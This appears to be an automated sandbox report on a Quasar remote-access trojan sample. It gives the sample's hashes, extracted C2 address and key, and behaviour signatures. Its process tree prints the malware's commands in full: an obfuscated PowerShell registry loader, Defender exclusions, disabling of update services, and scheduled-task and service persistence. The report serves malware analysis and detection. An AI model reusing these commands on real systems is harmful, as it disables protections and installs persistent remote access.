Analysis
-
max time kernel
20s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
27-12-2024 11:11
Behavioral task
behavioral1
Sample
7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe
Resource
win7-20240903-en
General
-
Target
7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe
-
Size
6.0MB
-
MD5
fcd7f27674626fbf8bcce5b0e991c03d
-
SHA1
143515e84e3b48e5bc5286d819f8fd10b8eb5685
-
SHA256
7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394
-
SHA512
3464f2200c9eedd17872842b2336786360b34a4bb2f0709b29cb1a8f794b437532193275b43378149424e2d651dba66657d850ccb37e613cb73e76d8a36b98f6
-
SSDEEP
98304:j3Go5BKtxo5fQIwuhk/UwalC+i0bBHXGgjaQx+OhfzTxzdloaDW:j3GozKYAEk9oCj0bR2Ej1hbTxkJ
Malware Config
Extracted
quasar
1.4.0
4Drun
185.148.3.216:4000
c3557859-56ac-475e-b44d-e1b60c20d0d0
-
encryption_key
B000736BEBDF08FC1B6696200651882CF57E43E7
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
3dfx Startup
-
subdirectory
SubDir
Signatures
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Quasar family
-
Quasar payload 3 IoCs
resource yara_rule behavioral1/files/0x0006000000019389-27.dat family_quasar behavioral1/memory/1900-29-0x00000000013C0000-0x0000000001444000-memory.dmp family_quasar behavioral1/memory/2768-35-0x0000000000F00000-0x0000000000F84000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 760 created 420 760 powershell.EXE 5 PID 1372 created 420 1372 powershell.EXE 5 -
pid Process 1604 powershell.exe 1860 powershell.exe 292 powershell.exe 1036 powershell.exe 1792 powershell.exe 2152 powershell.exe -
Creates new service(s) 2 TTPs
-
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WAGDKRVZ\ImagePath = "C:\\ProgramData\\mxergolzfguk\\kaptsegthwf.exe" services.exe -
Executes dropped EXE 5 IoCs
pid Process 3048 doihdjpihrekpoh.exe 536 mklnsegsd.exe 1900 ergbuiluyfd.exe 2768 Client.exe 1368 Bara.exe -
Loads dropped DLL 4 IoCs
pid Process 3052 7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe 3052 7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe 3052 7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe 2244 taskeng.exe -
Power Settings 1 TTPs 18 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 1744 powercfg.exe 1032 powercfg.exe 2404 powercfg.exe 2316 powercfg.exe 1696 powercfg.exe 2796 cmd.exe 1860 powercfg.exe 1316 powercfg.exe 1948 powercfg.exe 2400 powercfg.exe 988 cmd.exe 2932 powercfg.exe 1880 powercfg.exe 1488 powercfg.exe 1984 powercfg.exe 2156 powercfg.exe 1756 powercfg.exe 340 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe doihdjpihrekpoh.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 536 set thread context of 2092 536 mklnsegsd.exe 64 PID 760 set thread context of 560 760 powershell.EXE 74 PID 1372 set thread context of 2920 1372 powershell.EXE 75 PID 3048 set thread context of 2708 3048 doihdjpihrekpoh.exe 93 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Cuis\bon\Bara.exe mklnsegsd.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\Tasks\dialersvc64.job svchost.exe File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job svchost.exe File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\Tasks\dialersvc32.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc32.job dialer.exe File created C:\Windows\Tasks\dialersvc64.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc64.job dialer.exe -
Launches sc.exe 24 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1540 sc.exe 3052 sc.exe 1528 sc.exe 1476 sc.exe 376 sc.exe 268 sc.exe 2672 sc.exe 2576 sc.exe 2784 sc.exe 1516 sc.exe 1592 sc.exe 2864 sc.exe 1708 sc.exe 2412 sc.exe 2024 sc.exe 2272 sc.exe 1532 sc.exe 2476 sc.exe 1128 sc.exe 872 sc.exe 2936 sc.exe 1508 sc.exe 1728 sc.exe 2180 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2884 WMIC.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90a27a275058db01 powershell.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1928 schtasks.exe 3012 schtasks.exe 2724 schtasks.exe 2740 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3048 doihdjpihrekpoh.exe 1036 powershell.exe 1604 powershell.exe 2152 powershell.exe 760 powershell.EXE 1372 powershell.EXE 760 powershell.EXE 560 dllhost.exe 560 dllhost.exe 560 dllhost.exe 560 dllhost.exe 560 dllhost.exe 560 dllhost.exe 560 dllhost.exe 560 dllhost.exe 560 dllhost.exe 560 dllhost.exe 560 dllhost.exe 560 dllhost.exe 560 dllhost.exe 560 dllhost.exe 560 dllhost.exe 560 dllhost.exe 1372 powershell.EXE 2920 dllhost.exe 2920 dllhost.exe 2920 dllhost.exe 2920 dllhost.exe 560 dllhost.exe 560 dllhost.exe 2920 dllhost.exe 2920 dllhost.exe 560 dllhost.exe 560 dllhost.exe 2920 dllhost.exe 2920 dllhost.exe 560 dllhost.exe 560 dllhost.exe 2768 Client.exe 2920 dllhost.exe 2920 dllhost.exe 560 dllhost.exe 560 dllhost.exe 2920 dllhost.exe 2920 dllhost.exe 560 dllhost.exe 560 dllhost.exe 2920 dllhost.exe 2920 dllhost.exe 560 dllhost.exe 560 dllhost.exe 2920 dllhost.exe 2920 dllhost.exe 560 dllhost.exe 560 dllhost.exe 2920 dllhost.exe 2920 dllhost.exe 560 dllhost.exe 560 dllhost.exe 2768 Client.exe 2920 dllhost.exe 2920 dllhost.exe 560 dllhost.exe 560 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 1900 ergbuiluyfd.exe Token: SeDebugPrivilege 2768 Client.exe Token: SeDebugPrivilege 1036 powershell.exe Token: SeShutdownPrivilege 2932 powercfg.exe Token: SeShutdownPrivilege 1984 powercfg.exe Token: SeDebugPrivilege 1604 powershell.exe Token: SeShutdownPrivilege 1744 powercfg.exe Token: SeShutdownPrivilege 1860 powercfg.exe Token: SeDebugPrivilege 2152 powershell.exe Token: SeDebugPrivilege 760 powershell.EXE Token: SeDebugPrivilege 1372 powershell.EXE Token: SeDebugPrivilege 760 powershell.EXE Token: SeDebugPrivilege 560 dllhost.exe Token: SeDebugPrivilege 1372 powershell.EXE Token: SeDebugPrivilege 2920 dllhost.exe Token: SeShutdownPrivilege 1248 Explorer.EXE Token: SeShutdownPrivilege 1248 Explorer.EXE Token: SeAuditPrivilege 844 svchost.exe Token: SeDebugPrivilege 292 powershell.exe Token: SeDebugPrivilege 3048 doihdjpihrekpoh.exe Token: SeDebugPrivilege 2708 dialer.exe Token: SeShutdownPrivilege 2156 powercfg.exe Token: SeShutdownPrivilege 1880 powercfg.exe Token: SeShutdownPrivilege 1316 powercfg.exe Token: SeShutdownPrivilege 1032 powercfg.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2768 Client.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3052 wrote to memory of 3048 3052 7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe 31 PID 3052 wrote to memory of 3048 3052 7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe 31 PID 3052 wrote to memory of 3048 3052 7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe 31 PID 3052 wrote to memory of 536 3052 7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe 32 PID 3052 wrote to memory of 536 3052 7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe 32 PID 3052 wrote to memory of 536 3052 7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe 32 PID 3052 wrote to memory of 1900 3052 7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe 33 PID 3052 wrote to memory of 1900 3052 7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe 33 PID 3052 wrote to memory of 1900 3052 7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe 33 PID 1900 wrote to memory of 2740 1900 ergbuiluyfd.exe 34 PID 1900 wrote to memory of 2740 1900 ergbuiluyfd.exe 34 PID 1900 wrote to memory of 2740 1900 ergbuiluyfd.exe 34 PID 1900 wrote to memory of 2768 1900 ergbuiluyfd.exe 36 PID 1900 wrote to memory of 2768 1900 ergbuiluyfd.exe 36 PID 1900 wrote to memory of 2768 1900 ergbuiluyfd.exe 36 PID 2768 wrote to memory of 1928 2768 Client.exe 37 PID 2768 wrote to memory of 1928 2768 Client.exe 37 PID 2768 wrote to memory of 1928 2768 Client.exe 37 PID 536 wrote to memory of 1036 536 mklnsegsd.exe 41 PID 536 wrote to memory of 1036 536 mklnsegsd.exe 41 PID 536 wrote to memory of 1036 536 mklnsegsd.exe 41 PID 536 wrote to memory of 2920 536 mklnsegsd.exe 43 PID 536 wrote to memory of 2920 536 mklnsegsd.exe 43 PID 536 wrote to memory of 2920 536 mklnsegsd.exe 43 PID 536 wrote to memory of 2796 536 mklnsegsd.exe 44 PID 536 wrote to memory of 2796 536 mklnsegsd.exe 44 PID 536 wrote to memory of 2796 536 mklnsegsd.exe 44 PID 536 wrote to memory of 1604 536 mklnsegsd.exe 45 PID 536 wrote to memory of 1604 536 mklnsegsd.exe 45 PID 536 wrote to memory of 1604 536 mklnsegsd.exe 45 PID 2796 wrote to memory of 2932 2796 cmd.exe 49 PID 2796 wrote to memory of 2932 2796 cmd.exe 49 PID 2796 wrote to memory of 2932 2796 cmd.exe 49 PID 2920 wrote to memory of 2784 2920 cmd.exe 50 PID 2920 wrote to memory of 2784 2920 cmd.exe 50 PID 2920 wrote to memory of 2784 2920 cmd.exe 50 PID 2920 wrote to memory of 1508 2920 cmd.exe 51 PID 2920 wrote to memory of 1508 2920 cmd.exe 51 PID 2920 wrote to memory of 1508 2920 cmd.exe 51 PID 2920 wrote to memory of 2936 2920 cmd.exe 52 PID 2920 wrote to memory of 2936 2920 cmd.exe 52 PID 2920 wrote to memory of 2936 2920 cmd.exe 52 PID 2796 wrote to memory of 1984 2796 cmd.exe 53 PID 2796 wrote to memory of 1984 2796 cmd.exe 53 PID 2796 wrote to memory of 1984 2796 cmd.exe 53 PID 2920 wrote to memory of 1728 2920 cmd.exe 54 PID 2920 wrote to memory of 1728 2920 cmd.exe 54 PID 2920 wrote to memory of 1728 2920 cmd.exe 54 PID 2796 wrote to memory of 1744 2796 cmd.exe 55 PID 2796 wrote to memory of 1744 2796 cmd.exe 55 PID 2796 wrote to memory of 1744 2796 cmd.exe 55 PID 2920 wrote to memory of 1516 2920 cmd.exe 56 PID 2920 wrote to memory of 1516 2920 cmd.exe 56 PID 2920 wrote to memory of 1516 2920 cmd.exe 56 PID 2796 wrote to memory of 1860 2796 cmd.exe 57 PID 2796 wrote to memory of 1860 2796 cmd.exe 57 PID 2796 wrote to memory of 1860 2796 cmd.exe 57 PID 2920 wrote to memory of 1740 2920 cmd.exe 58 PID 2920 wrote to memory of 1740 2920 cmd.exe 58 PID 2920 wrote to memory of 1740 2920 cmd.exe 58 PID 2920 wrote to memory of 1760 2920 cmd.exe 59 PID 2920 wrote to memory of 1760 2920 cmd.exe 59 PID 2920 wrote to memory of 1760 2920 cmd.exe 59 PID 2920 wrote to memory of 2272 2920 cmd.exe 60 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:420
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{e1be78f7-7acb-4488-9a11-e0ad87b4b512}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{7ed147a9-ac17-40cd-8345-2a023c6c4460}2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
PID:476 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵PID:596
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe3⤵PID:1736
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}3⤵PID:288
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵PID:672
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵PID:748
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵PID:808
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵PID:1208
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:844 -
C:\Windows\system32\taskeng.exetaskeng.exe {61D2DC54-CCAD-4720-BD60-9372FDFBC4B1} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
PID:2244 -
C:\Program Files\Cuis\bon\Bara.exe"C:\Program Files\Cuis\bon\Bara.exe"4⤵
- Executes dropped EXE
PID:1368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force5⤵
- Command and Scripting Interpreter: PowerShell
PID:2152
-
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵PID:1740
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:3052
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:2672
-
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:872
-
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
PID:1708
-
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
PID:2576
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f6⤵PID:2892
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f6⤵PID:2716
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f6⤵PID:340
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f6⤵PID:1952
-
-
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
- Power Settings
PID:988 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Power Settings
PID:2404
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
- Power Settings
PID:340
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Power Settings
PID:2316
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Power Settings
PID:1696
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }5⤵
- Command and Scripting Interpreter: PowerShell
PID:1860 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn Barac /tr "'C:\Program Files\Cuis\bon\Bara.exe'"6⤵
- Scheduled Task/Job: Scheduled Task
PID:2724
-
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe ujznpffbjbh5⤵PID:1488
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"6⤵PID:1064
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor7⤵
- Detects videocard installed
PID:2884
-
-
-
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"5⤵PID:684
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:760
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵PID:960
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵PID:112
-
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵PID:1012
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵PID:904
-
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵PID:1112
-
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"2⤵PID:1616
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵PID:2012
-
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵PID:2296
-
-
C:\ProgramData\mxergolzfguk\kaptsegthwf.exeC:\ProgramData\mxergolzfguk\kaptsegthwf.exe2⤵PID:1800
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force3⤵
- Command and Scripting Interpreter: PowerShell
PID:1792
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart3⤵PID:2760
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart4⤵PID:2944
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc3⤵
- Launches sc.exe
PID:1128
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:2024
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv3⤵
- Launches sc.exe
PID:2272
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits3⤵
- Launches sc.exe
PID:1532
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc3⤵
- Launches sc.exe
PID:1540
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 03⤵
- Power Settings
PID:1948
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 03⤵
- Power Settings
PID:2400
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 03⤵
- Power Settings
PID:1756
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 03⤵
- Power Settings
PID:1488
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:876
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵PID:2820
-
-
C:\Windows\system32\dialer.exedialer.exe3⤵PID:2252
-
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:492
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵PID:500
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1248 -
C:\Users\Admin\AppData\Local\Temp\7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe"C:\Users\Admin\AppData\Local\Temp\7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Users\Admin\AppData\Local\Temp\doihdjpihrekpoh.exe"C:\Users\Admin\AppData\Local\Temp\doihdjpihrekpoh.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3048 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:292
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:1868
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵
- Drops file in Windows directory
PID:2120
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:1528
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:2412
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:2180
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:1592
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:2864
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1032
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2708
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "WAGDKRVZ"4⤵
- Launches sc.exe
PID:2476
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "WAGDKRVZ" binpath= "C:\ProgramData\mxergolzfguk\kaptsegthwf.exe" start= "auto"4⤵
- Launches sc.exe
PID:1476
-
-
